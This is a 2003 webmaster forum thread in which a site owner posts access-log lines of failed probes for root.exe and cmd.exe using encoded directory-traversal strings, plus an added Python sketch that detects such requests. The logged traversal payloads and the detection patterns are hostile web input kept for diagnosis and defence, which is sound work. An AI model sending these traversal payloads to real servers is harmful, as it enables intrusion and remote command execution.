Forum Moderators: DixonJones


MMM, someone hacking me?

Possible hack attempt to start cmd.exe?

         

traxdata0072000

12:08 pm on Dec 20, 2003 (gmt 0)

10+ Year Member



Hello,

I have a strange feeling that this was a hack attempt (see log below). Masked out the "attacker's" IP number with *.*.*.* .

*.*.*.* - - [10/Dec/2003:10:28:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
*.*.*.* - - [10/Dec/2003:10:28:33 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
*.*.*.* - - [10/Dec/2003:10:28:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
*.*.*.* - - [10/Dec/2003:10:28:33 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
*.*.*.* - - [10/Dec/2003:10:28:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
*.*.*.* - - [10/Dec/2003:10:28:34 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
*.*.*.* - - [10/Dec/2003:10:28:34 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
*.*.*.* - - [10/Dec/2003:10:28:35 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
*.*.*.* - - [10/Dec/2003:10:28:35 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:35 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:36 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:36 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:36 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 331
*.*.*.* - - [10/Dec/2003:10:28:37 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 331
*.*.*.* - - [10/Dec/2003:10:28:37 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
*.*.*.* - - [10/Dec/2003:10:28:37 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341

Does anyone know what this guy was up to? Or wasn't this a hack try? What can I make of this log?

Thanks in advance,
T
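
A detection sketch for the request pattern in the log above, as an added example that is not part of the original thread. It decodes each request path until it stops changing, flags traversal and command-shell probes, and separates rejected requests (the 404/400 responses seen here) from any the server actually served. The function names are hypothetical, and folding C0/C1 byte pairs into ASCII is an assumption about how a lenient decoder would treat them.

```python
import re
from urllib.parse import unquote_to_bytes

# Four request lines copied from the log in the post (source IP already masked there).
SAMPLE = r'''*.*.*.* - - [10/Dec/2003:10:28:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
*.*.*.* - - [10/Dec/2003:10:28:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
*.*.*.* - - [10/Dec/2003:10:28:36 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
*.*.*.* - - [10/Dec/2003:10:28:36 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 331'''.splitlines()

LINE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})\b')
OVERLONG = re.compile(rb'([\xc0\xc1])(.)', re.S)  # C0/C1 lead bytes are never valid UTF-8

def normalise(raw_path):
    """Return (canonical lower-case path, set of encoding tricks seen)."""
    tricks, data = set(), raw_path.encode('utf-8')
    for rounds in range(1, 5):                # percent-decode until stable, bounded
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        if rounds > 1:                        # a second round still changed the path
            tricks.add('double-encoding')
        data = decoded
    # Assumption: fold two-byte C0/C1 sequences the way a lenient decoder would.
    folded = OVERLONG.sub(lambda m: bytes([((m[1][0] & 0x1f) << 6) | (m[2][0] & 0x3f)]), data)
    if folded != data:
        tricks.add('overlong-utf8')
    return folded.decode('latin-1').replace('\\', '/').lower(), tricks

def analyse(line):
    """Parse one access-log line; return status, canonical path and tags, or None."""
    m = LINE.match(line)
    if not m:
        return None
    canon, tags = normalise(m[2].partition('?')[0])
    if '/../' in canon:
        tags.add('traversal')
    if canon.endswith(('/cmd.exe', '/root.exe')):
        tags.add('shell-probe')
    return {'status': int(m[3]), 'canonical': canon, 'tags': tags}

def served(lines):
    """Return (flagged count, flagged requests answered with a status below 400)."""
    hits = [a for a in map(analyse, lines) if a and a['tags']]
    return len(hits), [a for a in hits if a['status'] < 400]

if __name__ == '__main__':
    for a in map(analyse, SAMPLE):
        print(a['status'], sorted(a['tags']), a['canonical'])
    print('flagged, served:', served(SAMPLE))
```

An empty second element from `served()` means every flagged request was rejected; any entry there is the line to investigate first.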

Spica

12:36 pm on Dec 20, 2003 (gmt 0)

10+ Year Member



Nothing new. See for example:
[webmasterworld.com...]

traxdata0072000

2:13 pm on Dec 20, 2003 (gmt 0)

10+ Year Member



Thanks Spica, this can't bother me :-).

Now I can rest and have a merry Christmas to you ;-)

Many thanks,
T